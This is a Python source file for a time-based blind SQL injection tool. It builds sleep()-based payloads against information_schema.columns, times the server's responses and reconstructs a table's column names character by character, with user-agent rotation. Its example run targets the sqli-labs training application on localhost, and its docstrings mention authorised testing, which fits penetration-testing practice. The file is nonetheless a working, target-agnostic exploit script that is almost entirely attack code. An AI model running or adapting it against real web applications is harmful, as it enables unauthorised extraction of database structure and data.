# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 20:03
@Auth : zhangxiang
@File :BlindInject_StrColumn.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetColumnLength_Str import GetColumnLength_Str
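class BlindInject_StrColumn:
    """Time-based blind SQL injection that recovers a table's column names.

    For each character position of ``group_concat(column_name)`` (read from
    ``information_schema.columns``) one GET request is sent per candidate
    character.  The injected ``if(substr(...)=..., sleep(delay), 1)`` makes the
    server stall only when the guess is right, so a response that takes at
    least ``delay`` seconds is taken as a hit.

    Caveats a tester should keep in mind:
    - Latency spikes can push an honest response over ``delay`` and produce a
      false hit; on a slow or jittery link raise ``delay``.
    - MySQL string comparison is case-insensitive under the default collation,
      so a charset that contains both cases reports whichever is tried first.
    - The candidate is placed inside a single-quoted SQL literal, so the
      charset must not contain the quote character itself.
    - Only use this against systems you are authorised to test (the
      ``__main__`` block targets the sqli-labs training application).
    """

    # Payload appended to the vulnerable parameter.  Placeholders are filled by
    # build_payload(); ``%23`` is a URL-encoded ``#`` that comments out the rest
    # of the original query.
    _PAYLOAD = (
        "%20and%20if(substr((select%20group_concat(column_name)%20from%20information_schema.columns"
        "%20where%20table_name=%27{TableName}%27%20and%20table_schema=%27{DbName}%27),"
        "{position},1)=%27{candidate}%27,sleep({delay}),1)%23"
    )
    # Extra form field the lab page expects; 0x5375626D6974 is "Submit" as a hex literal.
    _SUBMIT = "&submit=0x5375626D6974%23"

    def build_payload(self, url: str, TableName: str, DbName: str,
                      position: int, candidate: str, delay=2) -> str:
        """Return the full URL that tests whether ``candidate`` is the character at ``position``.

        ``position`` is the 1-based offset handed to MySQL ``substr`` (offset 0
        always yields an empty string and can never match).  Every interpolated
        value is URL-encoded so characters such as ``#``, ``&``, ``%`` or a space
        in the charset do not corrupt the query string; alphanumerics and ``_``
        are left untouched, so typical identifiers are unchanged.
        """
        filled = self._PAYLOAD.format(
            TableName=parse.quote(TableName, safe=""),
            DbName=parse.quote(DbName, safe=""),
            position=position,
            candidate=parse.quote(candidate, safe=""),
            delay=delay,
        )
        return url + filled + self._SUBMIT

    def _measure(self, full_url: str, timeout) -> float:
        """Send one GET to ``full_url`` and return the elapsed time in seconds.

        The body is not needed -- the signal is how long the server takes to
        answer -- so the connection is closed right away (the original never
        closed it).  Network errors, including an exceeded ``timeout``, raise
        rather than being silently turned into a guess.
        """
        headers = {'User-Agent': random.choice(ua_list)}  # ua_list is imported from ua_info
        req = request.Request(url=full_url, headers=headers)
        start = time.monotonic()  # monotonic: not affected by wall-clock adjustments
        request.urlopen(req, timeout=timeout).close()
        return time.monotonic() - start

    def StartInject_StrColumn(self, url, code, resultList, TableName, numTable, DbName,
                              *, delay=2, timeout=None):
        """Recover ``numTable`` characters of the column-name list into ``resultList``.

        Args:
            url: vulnerable URL up to and including the injectable value, e.g. ``...?id=1'``.
            code: iterable of candidate characters (the charset), tried in order.
            resultList: list the recovered characters are appended to; it is
                mutated in place and also returned.
            TableName: table whose column names are extracted.
            numTable: length of ``group_concat(column_name)`` as found by
                GetColumnLength_Str; positions 1..numTable are probed.
            DbName: schema (``table_schema``) the table lives in.
            delay: seconds the server is told to ``sleep()`` on a correct guess;
                a response taking at least this long counts as a hit.
            timeout: per-request socket timeout in seconds; defaults to
                ``10 * delay`` so a hung target raises instead of blocking forever.

        Returns:
            ``resultList`` with one character appended per resolved position.
            A position that matches no candidate is reported and skipped, so a
            result shorter than ``numTable`` should be treated with suspicion
            (charset too small, or ``delay`` too short for the link).
        """
        if timeout is None:
            timeout = 10 * delay
        for position in range(1, numTable + 1):  # substr offsets are 1-based
            matched = False
            for candidate in code:
                full_url = self.build_payload(url, TableName, DbName, position, candidate, delay)
                elapsed = self._measure(full_url, timeout)
                if elapsed < delay:
                    continue
                print("*" * 200)
                resultList.append(candidate)
                print("得到盲注结果:" + str(resultList))
                print("注入的payload:" + full_url)
                print("使用的时间:" + str(elapsed))
                print("*" * 200)
                matched = True
                # One character per position: carrying on wastes requests and, with
                # case-insensitive comparison, would append the other case as well.
                break
            if not matched:
                print("第" + str(position) + "位未匹配到任何字符,请检查字典或延时阈值")
        return resultList

    def getStr(self, resultList) -> str:
        """Drop the leading marker element and join the rest into one string.

        ``resultList`` is mutated (its first element is removed), as before.
        An empty list yields ``""`` instead of raising IndexError.
        """
        if not resultList:
            return ""
        resultList.pop(0)
        return ''.join(str(item) for item in resultList)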
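if __name__ == '__main__':
    blindInject_StrColumn = BlindInject_StrColumn()
    getColumnLength_Str = GetColumnLength_Str()
    # Target is sqli-labs Less-1, a deliberately vulnerable training app on
    # localhost.  Point this only at hosts you are authorised to test.
    DbName = "security"
    TableName = "users"
    resultList = ["开始"]  # leading marker; getStr() removes it again
    path = './code2.txt'  # candidate charset, one character per position tried
    url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1'"
    # The context manager closes the file (the original leaked the handle).
    # Line breaks are dropped so a trailing newline is not tried as a candidate:
    # urllib rejects control characters in a URL, which would abort the run.
    with open(path, 'r', encoding='utf-8') as f:
        code = f.read().replace('\r', '').replace('\n', '')
    print(resultList[0])
    print("注入中,请稍等:")
    numTable = getColumnLength_Str.StartGetColumnLength_Str(url, TableName, DbName)
    print("该表中的字段名长度为:" + str(numTable))
    resultList = blindInject_StrColumn.StartInject_StrColumn(url, code, resultList, TableName, numTable, DbName)
    strList = blindInject_StrColumn.getStr(resultList)
    print("该表中的字段名有:" + strList)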